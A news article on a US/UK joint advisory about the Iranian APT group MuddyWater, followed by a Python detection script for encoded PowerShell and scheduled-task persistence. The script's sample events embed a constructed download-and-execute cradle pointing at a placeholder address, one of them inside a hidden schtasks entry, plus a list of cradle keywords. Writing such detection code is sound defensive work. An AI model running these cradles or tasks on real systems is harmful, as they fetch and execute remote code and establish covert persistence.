Security agencies announce they have detected new campaigns by MuddyWater against a “range of government and private-sector organizations”
US and UK security agencies issued a joint warning on Thursday regarding new espionage and disruption campaigns attributed to MuddyWater, a prolific APT group recently identified by US Cyber Command as a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).
According to the warning, issued by the FBI, CISA, US Cyber Command's Cyber National Mission Force (CNMF) and the UK's National Cyber Security Centre (NCSC-UK), the group has been targeting a “range of government and private-sector organizations across sectors – including telecommunications, defense, local government, and oil and natural gas – in Asia, Africa, Europe, and North America.”
“MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware,” says the warning, which goes on to mention that this threat actor maintains “persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions.”
“Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners,” tweeted CISA Director, Jen Easterly. “Our latest advisory provides details on Iranian government-sponsored APT actors known as MuddyWater.”
First noticed in 2017, MuddyWater – also known as Earth Vetala, MERCURY, TEMP.Zagros and Static Kitten – is one of the most widely researched cyber threat groups. Its primary goal is believed to be espionage and intelligence gathering, and it is best known for attacking targets in the Middle East and Asia. It employs a range of malware families, some of them custom-built, including PowGoop, Canopy and Mori.
MuddyWater's MO generally starts with gathering information about the victim's identity, followed by targeted spear-phishing emails carrying malicious links that deploy the group's malware. According to the warning, the group uses scheduled tasks to establish persistence, as well as various techniques to bypass User Account Control (UAC) and evade defensive measures.
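Two of the behaviours the advisory names, PowerShell obfuscated to hide its command-and-control logic and scheduled tasks used for persistence, can be surfaced from ordinary process-creation telemetry. The following is an added example written for this article, not code from the advisory or from any vendor; it triages a handful of constructed command lines (the 198.51.100.7 address is from the TEST-NET-2 documentation range, and no event is real telemetry). It decodes the UTF-16LE/base64 payload that `powershell -EncodedCommand` expects and looks inside it for download-and-execute cradles, and flags `schtasks /create` entries whose action launches PowerShell.

```python
"""Triage of process-creation command lines for two MuddyWater-style behaviours:
PowerShell hidden behind -EncodedCommand, and scheduled-task persistence.
Example code added to this article; sample events below are constructed."""
import base64
import re
from typing import Optional

# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob of useful length.
# Short values such as "-ExecutionPolicy Bypass" do not satisfy the {20,} quantifier.
ENCODED_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Substrings that usually mean "fetch something and run it" in a decoded script.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                  "frombase64string", "invoke-webrequest")


def encode_powershell(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script hidden behind -enc/-EncodedCommand, or None if absent/invalid."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return None
    return raw.decode("utf-16-le", errors="replace")


def assess(event: dict) -> list:
    """Return the list of findings for one process-creation event (empty if nothing suspicious)."""
    findings = []
    cmd = event["cmdline"]
    low = cmd.lower()
    script = decode_encoded_command(cmd)
    if script is not None:
        findings.append("encoded PowerShell command")
        if any(marker in script.lower() for marker in CRADLE_MARKERS):
            findings.append("download/execute cradle in decoded script")
    # Persistence: a task being created whose action runs PowerShell.
    if "schtasks" in low and "/create" in low and "powershell" in low:
        findings.append("scheduled task persistence running PowerShell")
    return findings


def triage(events: list) -> dict:
    """Map event id to findings for every event that produced at least one finding."""
    result = {}
    for event in events:
        findings = assess(event)
        if findings:
            result[event["id"]] = findings
    return result


# Constructed stager: a classic download cradle pointing at a documentation-range address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/u.ps1')"

# Constructed sample events (not real telemetry): two benign, two matching the advisory's TTPs.
SAMPLE_EVENTS = [
    {"id": "evt1", "cmdline": 'powershell.exe -NoProfile -ExecutionPolicy Bypass '
                              '-Command "Get-Service | Where-Object Status -eq Running"'},
    {"id": "evt2", "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                              + encode_powershell(STAGER)},
    {"id": "evt3", "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn "WindowsUpdateCheck" '
                              '/tr "powershell -w hidden -enc ' + encode_powershell(STAGER) + '" /f'},
    {"id": "evt4", "cmdline": 'schtasks.exe /query /tn "Microsoft\\Windows\\Defrag\\ScheduledDefrag"'},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(findings))
```

Run stand-alone it reports evt2 (encoded command containing a cradle) and evt3 (the same cradle wrapped in a five-minute scheduled task) and stays silent on the benign admin commands. The abbreviation-tolerant `-e[a-z]*` pattern matters in practice because PowerShell accepts any unambiguous prefix of `-EncodedCommand`, and attackers routinely use `-enc` or `-e`.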